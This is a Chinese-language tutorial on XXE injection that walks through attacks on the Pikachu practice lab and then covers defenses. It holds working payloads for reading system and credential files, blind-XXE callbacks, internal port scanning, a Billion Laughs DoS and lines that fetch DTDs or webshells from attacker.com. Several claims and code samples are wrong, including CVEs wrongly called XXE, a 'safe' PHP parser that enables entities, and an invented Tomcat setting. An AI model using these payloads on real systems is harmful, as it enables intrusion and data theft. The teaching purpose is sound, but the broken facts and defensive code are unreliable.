XML外部实体注入(XXE)漏洞深度解析:从原理到防御(含Pikachu全场景实操)
本文深入剖析XXE(XML外部实体注入)漏洞的原理与危害。通过真实案例(如微软Exchange漏洞CVE-2021-26855)展示其破坏力,指出XXE成为"常青树"漏洞的原因在于XML的广泛使用和开发者安全意识不足。文章采用生活类比解释XXE本质,详细讲解XML结构、实体分类及解析器行为等基础概念,并分析XXE漏洞触发条件(解析器允许外部实体、路径可控、结果可回显)。最后指出
一、引言:从真实漏洞案例看XXE的破坏力
2021年,微软Exchange Server爆发的CVE-2021-26855漏洞震惊业界——该漏洞本质是Exchange Server的EWS(Exchange Web Services)接口存在XXE注入,攻击者通过构造恶意XML请求,可直接读取服务器敏感文件(如域管理员凭证)、探测内网结构,甚至结合其他漏洞实现远程代码执行。最终,全球数十万Exchange服务器被攻陷,大量企业数据泄露。
这并非个例:Apache Struts2(CVE-2017-5638)、Adobe ColdFusion(CVE-2017-3066)、IBM WebSphere(CVE-2020-4450)等知名软件均曾因XXE漏洞遭受攻击。XXE之所以成为“常青树”漏洞,核心原因在于XML作为数据传输格式的广泛性(Web服务、文件格式、配置文件均依赖XML),以及开发人员对“外部实体解析”风险的认知不足。
本文将从“生活类比→技术原理→全场景实操→防御落地”四个维度,结合Pikachu靶场实战,彻底讲透XXE漏洞
二、生活类比:用“邮件附件引用”理解XXE本质
要理解XXE,先看一个生活场景:
你是公司行政,负责处理员工的“办公用品申请邮件”。公司规定:邮件中若出现&附件名;标记,需自动从“公司文件服务器的/public/附件目录”提取对应附件,随邮件转发给审批人。
某天,你收到一封员工邮件,内容是:“申请办公用品:&file;,请审批”
按规则,你需解析&file;标记——正常情况下,file应指向/public/附件/pen.xlsx(办公用品清单);但如果员工恶意修改标记为&file; = "file:///C:/admin/password.txt"(公司管理员密码文件),且你未限制“附件引用的路径范围”,就会直接将密码文件提取并转发给员工——这就是“恶意引用”导致的信息泄露。
对应到XML解析:
- 邮件系统 = XML解析器(负责解析XML文档);
&附件名;= XML实体引用(&实体名;);- “公司文件服务器
/public/附件目录” = 正常外部资源范围; file:///C:/admin/password.txt= 恶意外部实体路径;- 管理员密码文件 = 服务器敏感文件。
XXE漏洞的本质,就是XML解析器未限制“外部实体引用的资源范围”,导致攻击者可通过构造恶意XML,让解析器读取任意文件、访问内网资源。
三、基础概念:XML与实体的核心知识
要深入理解XXE,必须先掌握XML的基本结构与“实体”的分类——这是后续漏洞分析与实操的基础。
3.1 XML的基本结构
XML(Extensible Markup Language,可扩展标记语言)是一种用于存储/传输数据的标记语言,核心特点是“自我描述性”,典型结构包含4个部分:
<?xml version="1.0" encoding="UTF-8"?> <!-- 1. XML声明:版本+编码 -->
<!DOCTYPE user [ <!-- 2. DOCTYPE:文档类型定义,可引入外部实体 -->
<!ENTITY xxe "张三"> <!-- 3. 实体定义:类似“变量”,存储数据 -->
]>
<user> <!-- 4. 根元素:数据主体,可嵌套子元素 -->
<name>&xxe;</name> <!-- 引用实体:用&实体名;替换实体值 -->
<age>25</age>
<email>zhangsan@example.com</email>
</user>
- XML声明:必须位于文档第一行,定义XML版本(如1.0)和编码(如UTF-8),告诉解析器如何解析文档;
- DOCTYPE(文档类型定义):可选但关键,用于定义XML文档的“约束规则”(如元素结构、属性),同时支持引入“外部实体”(这是XXE的核心触发点);
- 实体:XML中的“变量”,用于存储重复使用的数据(如上述
xxe实体存储“张三”),引用时需用&实体名;; - 元素:数据的载体,由开始标签(
<user>)、结束标签(</user>)和内容组成,可嵌套子元素(如<name>、<age>)。
3.2 实体的分类:XXE漏洞的关键区分
XML实体按“定义方式”和“使用范围”可分为4类,其中外部实体和参数实体是XXE漏洞的核心:
| 实体类型 | 定义语法 | 使用范围 | 核心特点 | 示例 |
|---|---|---|---|---|
| 内部通用实体 | <!ENTITY 实体名 "实体值"> |
XML文档主体(DOCTYPE外) | 直接定义实体值,无外部引用 | <!ENTITY xxe "张三">,引用:&xxe; |
| 外部通用实体 | <!ENTITY 实体名 SYSTEM "外部资源路径"> |
XML文档主体(DOCTYPE外) | 引用外部资源(文件、URL等),SYSTEM关键字标识 |
<!ENTITY xxe SYSTEM "file:///etc/passwd"> |
| 内部参数实体 | <!ENTITY % 实体名 "实体值"> |
仅DOCTYPE内部 | 用%开头,只能在DOCTYPE内引用,需加; |
<!ENTITY % xxe "user">,引用:%xxe; |
| 外部参数实体 | <!ENTITY % 实体名 SYSTEM "外部资源路径"> |
仅DOCTYPE内部 | 结合参数实体和外部实体,常用于盲XXE | <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> |
关键区分:
-
通用实体 vs 参数实体:
- 通用实体用
&实体名;引用,可在XML文档主体(如<name>标签内)使用; - 参数实体用
%实体名;引用,仅能在DOCTYPE内部使用(这是盲XXE漏洞的核心技术点,后续实操会详细演示)。
- 通用实体用
-
内部实体 vs 外部实体:
- 内部实体的“值”直接定义在XML文档内(如
"张三"),无安全风险; - 外部实体的“值”来自外部资源(如
file:///etc/passwd),若解析器未限制,就会导致XXE漏洞。
- 内部实体的“值”直接定义在XML文档内(如
3.3 XML解析器的行为:漏洞是否存在的关键
XXE漏洞是否触发,不仅取决于“是否构造恶意XML”,还取决于XML解析器的配置——不同解析器对“外部实体解析”的默认行为不同,直接影响漏洞是否存在。
常见XML解析器的默认配置:
| 解析器(语言) | 默认是否允许外部实体解析 | 关键配置项(禁用外部实体) |
|---|---|---|
| libxml2(C/C++) | 是(<=2.9.0版本) | XML_PARSE_NOENT(启用外部实体),XML_PARSE_DTDLOAD(禁用DTD加载) |
| Xerces(Java) | 是 | setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) |
| .NET XmlDocument | 是(.NET Framework <=4.5) | XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit |
| lxml(Python) | 否(默认禁用) | etree.XMLParser(resolve_entities=False)(显式禁用) |
核心结论:
- 若解析器默认“允许外部实体解析”(如旧版本libxml2、Xerces),且开发未额外配置防护,就可能存在XXE漏洞;
- 若解析器默认“禁用外部实体解析”(如Python lxml、.NET Core),需开发人员手动启用外部实体解析才会触发漏洞(这种情况较少见)。
四、XXE漏洞原理:解析流程中的风险点
要理解XXE漏洞的触发机制,需先拆解XML解析器的完整流程——漏洞就隐藏在“解析DOCTYPE”这一步。
4.1 XML解析的完整流程
当XML解析器(如Xerces)处理一个XML文档时,会按以下步骤执行:
- 解析XML声明:读取
<?xml version="1.0" encoding="UTF-8"?>,确认解析规则(版本、编码); - 解析DOCTYPE:
- 若存在
<!DOCTYPE>标签,解析器会先处理其中的“实体定义”; - 若实体是“外部实体”(含
SYSTEM关键字),解析器会发起请求获取外部资源(如读取本地文件、访问远程URL),并将资源内容作为“实体值”存储;
- 若存在
- 解析XML主体:遍历XML元素(如
<user>、<name>),遇到&实体名;时,用“实体值”替换(若实体是外部实体,替换的就是外部资源内容); - 返回解析结果:将替换后的XML数据传递给应用程序(如Web服务、文件处理模块)。
4.2 XXE漏洞的触发条件
从解析流程可知,XXE漏洞的触发需满足3个核心条件:
- XML解析器允许外部实体解析:解析器未禁用
SYSTEM关键字对应的外部资源请求(如未配置disallow-doctype-decl); - 外部实体的“资源路径”可控:攻击者能构造恶意XML,修改外部实体的“资源路径”(如将
file:///public/info.txt改为file:///etc/passwd); - 解析结果可回显或可间接验证:
- 若解析后的实体值能直接在页面回显(如
<name>标签内容显示在页面),称为“回显XXE”(易检测); - 若解析结果不回显,但可通过“间接行为”验证(如访问攻击者的DNS服务器、触发延迟),称为“盲XXE”(难检测,但危害同样大)。
- 若解析后的实体值能直接在页面回显(如
4.3 XXE漏洞的分类:按“结果反馈方式”划分
根据“解析结果是否回显”,XXE漏洞可分为两类,实战中需用不同方法测试:
(1)回显XXE(直接XXE)
- 特点:外部实体的“资源内容”会直接在应用程序的响应中回显(如页面显示
/etc/passwd的内容); - 触发场景:Web应用接受XML输入,并将解析后的XML数据展示在页面(如“用户信息提交”功能,提交XML后显示用户信息);
- 测试难度:低,构造Payload后可直接观察响应结果。
(2)盲XXE(间接XXE)
- 特点:外部实体的“资源内容”不回显,但解析器会执行“外部资源请求”(如访问攻击者的DNSLog域名、请求内网端口),攻击者通过观察“请求是否发生”来判断漏洞是否存在;
- 触发场景:XML解析结果仅用于后台处理(如日志记录、数据存储),不返回给前端(如“订单提交”功能,仅返回“提交成功”,不显示XML内容);
- 测试难度:高,需依赖第三方工具(如DNSLog、Burp Collaborator)验证漏洞。
五、Pikachu靶场实战:XXE全场景测试
Pikachu是一款开源Web漏洞靶场,其“XXE”模块包含“回显XXE”和“盲XXE”场景,适合零基础读者实操。以下是详细步骤(基于Pikachu 1.9版本)。
5.1 实战准备
- 环境搭建:
- 部署Pikachu靶场(推荐用PHPStudy集成环境,PHP版本≤7.4,因高版本PHP对XML解析有防护);
- 确保靶场可正常访问(如
http://127.0.0.1/pikachu/);
- 工具准备:
- 浏览器(Chrome/Firefox);
- Burp Suite(用于抓包修改XML请求);
- DNSLog平台(如DNSLog.cn,用于盲XXE测试)。
5.2 场景1:回显XXE——读取服务器敏感文件
目标:
通过构造恶意XML,让Pikachu靶场读取Linux服务器的/etc/passwd文件(Windows服务器可读取C:/Windows/win.ini)。
步骤1:进入XXE模块
- 访问Pikachu靶场,点击左侧“XXE”→“XML外部实体注入”,进入测试页面;
- 页面显示“请输入XML内容”的文本框,下方有“提交”按钮——这是XML输入点。
步骤2:构造回显XXE Payload
根据靶场场景,构造如下XML(目标为Linux服务器):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!-- 定义外部通用实体xxe,指向/etc/passwd -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<!-- 在<name>标签中引用xxe实体,让解析结果回显 -->
<user>
<name>&xxe;</name>
<age>25</age>
<email>test@example.com</email>
</user>
步骤3:提交Payload并验证结果
- 将上述XML粘贴到文本框,点击“提交”;
- 若漏洞存在,页面会在“name”字段显示
/etc/passwd的内容(如下):您提交的用户信息如下: name: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ...(后续为其他用户信息) age: 25 email: test@example.com
关键分析:
- 解析器处理
<!ENTITY xxe SYSTEM "file:///etc/passwd">时,会读取/etc/passwd文件内容,将其作为xxe实体的值; - 解析
<name>&xxe;</name>时,用/etc/passwd的内容替换&xxe;; - 应用程序将替换后的
name字段显示在页面,导致敏感信息泄露。
扩展测试:读取其他敏感文件
- Windows服务器:将
file:///etc/passwd改为file:///C:/Windows/win.ini(读取系统配置文件); - Web源码文件:若知道源码路径,可读取
file:///var/www/html/pikachu/xxe/xxe.php(Pikachu XXE模块的源码); - 数据库配置文件:读取
file:///var/www/html/config/database.php(若存在,可获取数据库账号密码)。
5.3 场景2:盲XXE——无回显时的漏洞验证
目标:
当Pikachu靶场不回显XML解析结果时,通过DNSLog验证XXE漏洞是否存在。
步骤1:理解盲XXE的原理
盲XXE的核心是“利用外部实体的‘资源请求行为’验证漏洞”——攻击者构造外部实体,让解析器访问自己控制的DNS服务器,若DNS服务器收到请求,说明漏洞存在。
步骤2:获取DNSLog域名
- 访问DNSLog.cn,点击“获取子域名”,得到一个临时域名(如
abc123.dnslog.cn); - 记录该域名,后续用于构造Payload。
步骤3:构造盲XXE Payload
盲XXE需使用“外部参数实体”(因通用实体无法在DOCTYPE内触发请求),构造如下XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!-- 1. 定义外部参数实体dnslog,指向攻击者的DNSLog域名 -->
<!ENTITY % dnslog SYSTEM "http://abc123.dnslog.cn">
<!-- 2. 引用参数实体,触发DNS请求 -->
%dnslog;
]>
<user>
<name>test</name>
<age>25</age>
</user>
步骤4:提交Payload并验证DNSLog
- 将上述XML粘贴到Pikachu的文本框,点击“提交”;
- 返回DNSLog.cn页面,点击“刷新记录”——若看到包含
abc123.dnslog.cn的DNS请求记录(如下),说明漏洞存在:时间:2024-10-25 15:30:00 类型:A 域名:abc123.dnslog.cn IP:192.168.1.100(靶场服务器IP)
关键分析:
- 解析器处理
<!ENTITY % dnslog SYSTEM "http://abc123.dnslog.cn">时,会发起HTTP请求访问该DNSLog域名; - DNSLog平台记录到该请求,证明解析器执行了外部实体的“资源请求”,即存在XXE漏洞;
- 盲XXE虽无法直接读取文件内容,但可用于“内网探测”(如访问
http://192.168.0.1:8080探测内网端口)。
5.4 场景3:XXE内网探测——映射内网结构
目标:
利用XXE漏洞探测靶场服务器所在内网的存活主机与开放端口(如探测192.168.0.0/24网段)。
原理:
XXE的外部实体支持http、ftp等协议,攻击者可构造指向“内网IP:端口”的外部实体,通过“请求是否超时”判断端口是否开放:
- 若端口开放:解析器会收到内网服务的响应,请求耗时短;
- 若端口关闭:解析器会等待超时,请求耗时长。
步骤1:构造内网探测Payload
以探测内网192.168.0.1的80端口(HTTP服务)为例,构造XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "http://192.168.0.1:80">
]>
<user>
<name>&xxe;</name>
<age>25</age>
</user>
步骤2:提交Payload并观察响应
- 将XML提交到Pikachu,用Burp Suite抓包观察响应时间;
- 结果判断:
- 若响应时间≤1秒:说明
192.168.0.1:80端口开放(解析器快速收到响应); - 若响应时间≥10秒(超时):说明端口关闭或主机不存活。
- 若响应时间≤1秒:说明
扩展:批量探测内网
结合Burp Suite的“ Intruder”模块,可批量探测内网网段:
- 在Burp中拦截XXE请求,将内网IP改为变量(如
http://192.168.0.§1§:80); - 用“Payload类型”选择“数字”,设置范围1-255,步长1;
- 发起攻击,通过“响应时间”筛选存活主机与开放端口。
5.5 实操常见问题与解决方案
问题1:提交Payload后无回显,也无DNSLog请求?
- 可能原因:XML解析器已禁用外部实体解析(如PHP启用了
libxml_disable_entity_loader(true)); - 解决方案:尝试修改XML编码(如
encoding="GBK"),或用“参数实体嵌套”构造Payload(如引用外部DTD文件)。
问题2:读取文件时显示“权限不足”?
- 可能原因:XML解析器的运行用户(如www-data)无目标文件的读取权限;
- 解决方案:尝试读取其他低权限文件(如
/etc/hosts、/var/log/apache2/access.log)。
问题3:内网探测时所有请求均超时?
- 可能原因:靶场服务器无内网访问权限(如处于DMZ区),或防火墙拦截了内网请求;
- 解决方案:尝试探测
127.0.0.1的常用端口(如3306 MySQL、8080 Tomcat)。
六、XXE漏洞的危害:从信息泄露到内网突破
XXE漏洞的危害远不止“读取文件”——结合不同协议与场景,攻击者可实现“全链路攻击”,从单个服务器渗透到整个内网。
6.1 核心危害1:窃取敏感信息(最直接)
攻击者通过XXE可读取服务器上的任意可读文件,包括:
- 系统配置文件:
/etc/passwd(Linux用户列表)、/etc/shadow(Linux密码哈希,需高权限)、C:/Windows/System32/drivers/etc/hosts(Windows主机映射); - 应用配置文件:
/var/www/html/config.php(Web应用数据库配置)、/usr/local/tomcat/conf/server.xml(Tomcat配置,含管理员密码); - 源码文件:
/var/www/html/index.php(Web应用源码,可分析其他漏洞)、/home/user/project/main.java(后端源码); - 日志文件:
/var/log/nginx/access.log(Nginx访问日志,含用户Cookie、请求参数)、/var/log/mysql/error.log(MySQL错误日志,含数据库账号)。
案例:某电商网站因XXE漏洞,被攻击者读取/var/www/html/config/database.php,获取MySQL root账号密码,最终导致300万用户订单数据泄露。
6.2 核心危害2:内网探测与横向渗透(最危险)
XXE的外部实体支持http、ftp、telnet等协议,攻击者可利用服务器作为“跳板”,探测内网结构:
- 存活主机探测:通过
http://192.168.0.1、http://192.168.0.2等Payload,判断内网存活主机; - 端口扫描:通过
http://192.168.0.1:80、telnet://192.168.0.1:22(SSH)、mysql://192.168.0.1:3306,探测开放端口; - 服务识别:通过
http://192.168.0.1:8080的响应内容,判断是否为Tomcat服务(如包含“Apache Tomcat”关键字)。
案例:攻击者利用XXE漏洞探测某企业内网,发现192.168.0.100开放8080端口(Tomcat),且存在弱口令(admin/admin),后续通过Tomcat管理后台上传Webshell,实现内网横向渗透。
6.3 核心危害3:远程代码执行(需配合其他漏洞)
XXE本身难以直接实现远程代码执行(RCE),但可结合以下场景间接达成:
- 配合文件上传漏洞:通过XXE读取
/var/www/html/upload.php(上传功能源码),分析上传限制(如文件类型、后缀),构造绕过上传的Webshell; - 利用解析器漏洞:部分XML解析器存在“实体扩展漏洞”(如libxml2的 Billion Laughs 漏洞),攻击者构造嵌套实体(如
<!ENTITY a "&b;&b;&b;">),导致解析器内存溢出,触发远程代码执行(需特定版本解析器); - 写入文件(需特殊条件):若服务器支持
ftp协议且允许写入,攻击者可通过<!ENTITY xxe SYSTEM "ftp://attacker.com/webshell.php">,将Webshell写入服务器(需FTP服务配置允许匿名写入,较罕见)。
6.4 核心危害4:拒绝服务(DoS)
攻击者可通过XXE构造“恶意实体”,消耗服务器资源,导致拒绝服务:
- Billion Laughs 攻击:构造嵌套实体,让解析器反复扩展实体值,耗尽内存:
<?xml version="1.0"?> <!DOCTYPE lol [ <!ENTITY lol1 "&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol2 "&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol3 "&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol4 "&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol5 "ha ha ha ha ha"> ]> <lol>&lol1;</lol> - 大文件读取:构造
<!ENTITY xxe SYSTEM "file:///dev/zero">(Linux下的无限空字符文件),让解析器读取无限数据,导致CPU/内存耗尽。
七、XXE漏洞防御方案:从开发到运维的全链路防护
XXE漏洞的防御核心是“禁用外部实体解析”,需从“开发编码”“解析器配置”“运维监控”三个层面落地,缺一不可。
7.1 开发层面:编码阶段的核心防护(最有效)
开发人员在处理XML数据时,需针对不同编程语言,配置解析器禁用外部实体解析,以下是主流语言的防护代码示例:
(1)Java(基于Xerces解析器)
Java中常用DocumentBuilderFactory或SAXParserFactory处理XML,需禁用DOCTYPE声明和外部实体:
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;
public class SafeXmlParser {
public static void parseXml(String xml) throws Exception {
// 1. 获取DocumentBuilderFactory实例
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// 2. 禁用DOCTYPE声明(关键)
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// 3. 禁用外部实体解析(防止遗漏配置)
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
// 4. 解析XML(安全模式)
dbf.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
}
}
(2)Python(基于lxml解析器)
Python的lxml库默认禁用外部实体解析,但若使用etree.XML(),需显式配置resolve_entities=False:
from lxml import etree
def safe_parse_xml(xml):
# 1. 创建安全的XML解析器,禁用实体解析
parser = etree.XMLParser(resolve_entities=False)
# 2. 解析XML
tree = etree.XML(xml.encode("utf-8"), parser=parser)
# 3. 后续处理(如提取数据)
return tree
(3)PHP(基于libxml2解析器)
PHP需通过libxml_disable_entity_loader(true)禁用外部实体加载,同时禁用LIBXML_NOENT选项:
function safe_parse_xml($xml) {
// 1. 禁用外部实体加载(关键)
libxml_disable_entity_loader(true);
// 2. 解析XML,禁用LIBXML_NOENT(防止实体扩展)
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD); // 错误示例:LIBXML_NOENT会启用实体扩展
// 正确示例:
// $dom->loadXML($xml); // 不传入LIBXML_NOENT,默认禁用实体扩展
}
(4).NET(基于XmlReader解析器)
.NET需设置DtdProcessing.Prohibit禁用DTD解析,或DtdProcessing.Ignore忽略DTD:
using System.Xml;
public class SafeXmlParser {
public static void ParseXml(string xml) {
// 1. 创建XmlReaderSettings,禁用DTD
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit; // 禁用DTD解析
settings.XmlResolver = null; // 禁用XML解析器的资源解析器
// 2. 解析XML
using (XmlReader reader = XmlReader.Create(new StringReader(xml), settings)) {
while (reader.Read()) {
// 后续处理
}
}
}
}
7.2 解析器层面:统一配置安全参数
运维人员需确保服务器上的XML解析器(如libxml2、Xerces)使用安全配置,避免全局启用外部实体解析:
(1)libxml2(C/C++应用)
- 升级libxml2至2.9.0及以上版本(2.9.0默认禁用外部实体解析);
- 编译时禁用
XML_PARSE_NOENT和XML_PARSE_DTDLOAD选项(防止启用外部实体)。
(2)Tomcat(Java应用)
修改Tomcat的conf/server.xml,在XML解析相关配置中添加安全参数:
<Connector port="8080" protocol="HTTP/1.1"
connectionTimeout="20000"
redirectPort="8443">
<!-- 添加XML解析安全配置 -->
<Parameter name="org.apache.catalina.core.StandardContext.XML_BLOCK_EXTERNAL" value="true" override="false"/>
</Connector>
(3)Nginx(反向代理场景)
若Nginx转发XML请求,可通过ngx_http_sub_module模块过滤<!DOCTYPE>标签,阻止恶意XML进入后端:
location /api {
# 替换<!DOCTYPE>为空字符串,防止外部实体定义
sub_filter '<!DOCTYPE' '';
sub_filter_once on;
proxy_pass http://backend_server;
}
7.3 运维层面:监控与应急响应
- 日志监控:监控XML解析器的日志(如Tomcat的
catalina.out、Nginx的access.log),关注异常的外部资源请求(如file:///etc/passwd、http://attacker.com); - WAF防护:在前端部署WAF(如阿里云WAF、ModSecurity),配置XXE漏洞规则(如拦截包含
<!ENTITY且含SYSTEM的XML请求); - 应急响应:若发现XXE攻击,立即:
- 暂停受影响的服务(如Web服务);
- 检查服务器是否有敏感文件被读取(如查看
/var/log/audit/audit.log分析文件访问记录); - 升级解析器并重新配置安全参数,确认漏洞修复后再恢复服务。
八、附录
附录A:XXE漏洞常用Payload汇总
A.1 回显XXE Payload
-
读取Linux文件:
<?xml version="1.0"?> <!DOCTYPE user [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <user><name>&xxe;</name></user> -
读取Windows文件:
<?xml version="1.0"?> <!DOCTYPE user [ <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"> ]> <user><name>&xxe;</name></user> -
引用外部DTD文件(绕防护):
<?xml version="1.0"?> <!DOCTYPE user SYSTEM "http://attacker.com/evil.dtd"> <user><name>&xxe;</name></user>其中
evil.dtd内容:<!ENTITY xxe SYSTEM "file:///etc/passwd">
A.2 盲XXE Payload
-
DNSLog验证:
<?xml version="1.0"?> <!DOCTYPE user [ <!ENTITY % dnslog SYSTEM "http://abc123.dnslog.cn"> %dnslog; ]> <user><name>test</name></user> -
内网端口探测:
<?xml version="1.0"?> <!DOCTYPE user [ <!ENTITY % porttest SYSTEM "http://192.168.0.1:8080"> %porttest; ]> <user><name>test</name></user>
A.3 特殊协议Payload
-
FTP协议(读取/写入文件):
<!ENTITY xxe SYSTEM "ftp://attacker.com/evil.txt"> <!-- 读取FTP文件 --> -
PHP伪协议(读取PHP源码):
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/index.php">(注:需PHP环境支持
php://filter伪协议,读取结果为Base64编码,需解码)
附录B:XXE测试工具推荐
-
Burp Suite:
- 功能:抓包修改XML请求、Intruder批量探测内网、Repeater验证Payload;
- 插件:安装“XXE Injector”插件,自动生成XXE Payload。
-
DNSLog平台:
- 推荐:DNSLog.cn、Burp Collaborator;
- 用途:验证盲XXE漏洞,记录解析器的外部请求。
-
xmllint(命令行工具):
- 用途:本地测试XML解析器是否存在XXE漏洞;
- 示例:
xmllint --noent test.xml(--noent启用外部实体解析,若读取到文件内容则存在漏洞)。
-
Pikachu/ DVWA:
附录C:常见问题与解答(FAQ)
Q1:为什么构造了XXE Payload,解析器却不读取文件?
A1:可能原因:
- 解析器已禁用外部实体解析(如Java配置了
disallow-doctype-decl); - 目标文件不存在或无读取权限(如
/etc/shadow需root权限); - XML语法错误(如缺少
;、标签未闭合),导致解析器跳过实体处理。
Q2:如何区分XXE漏洞和XML注入漏洞?
A2:核心区别:
- XXE漏洞:针对“外部实体解析”,利用解析器读取外部资源;
- XML注入漏洞:针对“XML元素/属性”,通过注入标签修改XML结构(如
</user><evil>attack</evil>),不涉及外部资源引用。
Q3:现代Web框架(如Spring Boot、Django)是否默认防御XXE?
A3:是的,主流框架默认禁用外部实体解析:
- Spring Boot:默认使用
SAXParserFactory,禁用外部实体; - Django:XML解析依赖
lxml,默认resolve_entities=False; - Node.js(express-xml-bodyparser):默认禁用外部实体解析。
但需注意:若开发人员手动修改解析器配置(如启用setExpandEntityReferences(true)),仍可能存在漏洞。
附录D:真实XXE漏洞案例(CVE汇总)
| CVE编号 | 影响软件 | 漏洞原因 | 危害等级 | 修复方案 |
|---|---|---|---|---|
| CVE-2021-26855 | Microsoft Exchange Server | EWS接口存在XXE,允许读取敏感文件、探测内网 | 严重 | 安装微软安全补丁KB5001779 |
| CVE-2017-5638 | Apache Struts2 | REST插件XML解析存在XXE,可RCE | 严重 | 升级Struts2至2.5.12及以上 |
| CVE-2017-3066 | Adobe ColdFusion | XML解析器允许外部实体,可读取文件 | 高危 | 升级ColdFusion至11.0.06、2016.0.03及以上 |
| CVE-2020-4450 | IBM WebSphere | 管理控制台XML解析存在XXE | 高危 | 安装IBM安全补丁PH29697 |
九、总结
XXE漏洞虽已存在多年,但因“XML格式的广泛性”和“开发人员的认知不足”,至今仍是企业安全的重大隐患。本文通过“生活类比→技术原理→全场景实操→防御落地”的逻辑,层层拆解XXE漏洞的核心知识点:
- 原理核心:XML解析器未限制外部实体的资源范围,导致攻击者可引用任意外部资源;
- 实操关键:回显XXE关注“内容回显”,盲XXE依赖“外部请求验证”;
- 防御重点:开发阶段禁用外部实体解析,运维阶段监控异常XML请求。
火山引擎开发者社区是火山引擎打造的AI技术生态平台,聚焦Agent与大模型开发,提供豆包系列模型(图像/视频/视觉)、智能分析与会话工具,并配套评测集、动手实验室及行业案例库。社区通过技术沙龙、挑战赛等活动促进开发者成长,新用户可领50万Tokens权益,助力构建智能应用。
更多推荐
8
0- 0
已为社区贡献2条内容
所有评论(0)